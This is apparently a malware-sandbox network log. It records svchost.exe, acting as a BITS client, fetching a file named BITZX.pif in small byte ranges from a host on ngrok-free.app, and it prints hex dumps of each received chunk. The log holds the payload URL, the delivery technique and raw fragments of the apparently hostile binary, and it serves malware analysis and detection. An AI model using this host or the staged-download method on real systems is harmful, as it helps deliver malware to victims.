        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        78192.168.11.20497923.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:29 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=19131-19373
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:30 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 243
        Content-Range: bytes 19131-19373/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:30 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:30 UTC243INData Raw: 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00
        Data Ascii: *0*0*.(C(9****0**0**0**0*0*0*.(C(9****0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        79192.168.11.20497933.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:33 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=19374-19927
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:34 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 554
        Content-Range: bytes 19374-19927/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:34 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:34 UTC554INData Raw: 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13
        Data Ascii: **0*0*.(C(9*****0*.(C(9****0**0**0**0**0*


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        80192.168.11.20497943.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:37 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=19928-20392
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:38 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 465
        Content-Range: bytes 19928-20392/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:38 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:38 UTC465INData Raw: 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28
        Data Ascii: **0**0*0*.(C(9****0***0*.(C(9****0**0*0*.(C(


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        81192.168.11.20497953.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:40 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=20393-20488
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:40 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 96
        Content-Range: bytes 20393-20488/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:40 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:40 UTC96INData Raw: 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13
        Data Ascii: *.(C(9****0**0**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        82192.168.11.20497963.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:42 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=20489-20672
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:42 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 184
        Content-Range: bytes 20489-20672/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:41 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:42 UTC184INData Raw: 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13
        Data Ascii: 0***0*.(C(9****0***0*0*.(C(9****


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        83192.168.11.20497973.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:45 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=20673-20809
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:45 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 137
        Content-Range: bytes 20673-20809/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:44 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:45 UTC137INData Raw: 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00
        Data Ascii: 0**0**0*0*.(C(9****0**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        84192.168.11.20497983.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:49 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=20810-20981
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:49 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 172
        Content-Range: bytes 20810-20981/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:48 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:49 UTC172INData Raw: 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06
        Data Ascii: 0**0*0*.(C(9****0**0*0*0*.(C


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        85192.168.11.20497993.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:53 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=20982-21090
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:53 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 109
        Content-Range: bytes 20982-21090/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:53 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:53 UTC109INData Raw: 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00
        Data Ascii: (9****0**0*0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        86192.168.11.20498003.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:43:57 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=21091-21204
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:43:57 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 114
        Content-Range: bytes 21091-21204/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:56 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:43:57 UTC114INData Raw: 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00
        Data Ascii: ***0*.(C(9***0**0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        87192.168.11.20498013.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:00 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=21205-21507
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:00 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 303
        Content-Range: bytes 21205-21507/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:43:59 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:00 UTC303INData Raw: 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00
        Data Ascii: *0*0*0*.(C(9***0**0**0**0**0**.(C(9***0**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        88192.168.11.20498023.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:03 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=21508-21870
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:03 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 363
        Content-Range: bytes 21508-21870/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:02 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:03 UTC363INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28
        Data Ascii: **0**0***.(C(9***0**0*0*0*0*0*0*0*0*.(C(


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        89192.168.11.20498033.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:05 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=21871-22267
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:05 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 397
        Content-Range: bytes 21871-22267/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:04 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:05 UTC397INData Raw: 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00
        Data Ascii: **0**0**0**0**.(C(9*******0**0*******


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        90192.168.11.20498043.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:08 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=22268-22879
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:08 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 612
        Content-Range: bytes 22268-22879/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:07 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:08 UTC612INData Raw: 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00
        Data Ascii: .(C(9***0**.(C(9***0**0*0*0*0*0*0*0*0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        91192.168.11.20498053.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:10 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=22880-22981
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:10 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 102
        Content-Range: bytes 22880-22981/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:09 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:10 UTC102INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00
        Data Ascii: **0**0**0***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        92192.168.11.20498063.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:12 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=22982-23035
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:12 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 54
        Content-Range: bytes 22982-23035/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:12 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:12 UTC54INData Raw: 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a
        Data Ascii: *0*0*0*


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        93192.168.11.20498073.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:16 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=23036-23581
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:16 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 546
        Content-Range: bytes 23036-23581/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:15 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:16 UTC546INData Raw: 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07
        Data Ascii: 0*0*0*.(C(9***.(C(9*0**0*0*0*0*.(C(9***0**0**0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        94192.168.11.20498083.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:19 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=23582-23937
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:19 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 356
        Content-Range: bytes 23582-23937/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:18 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
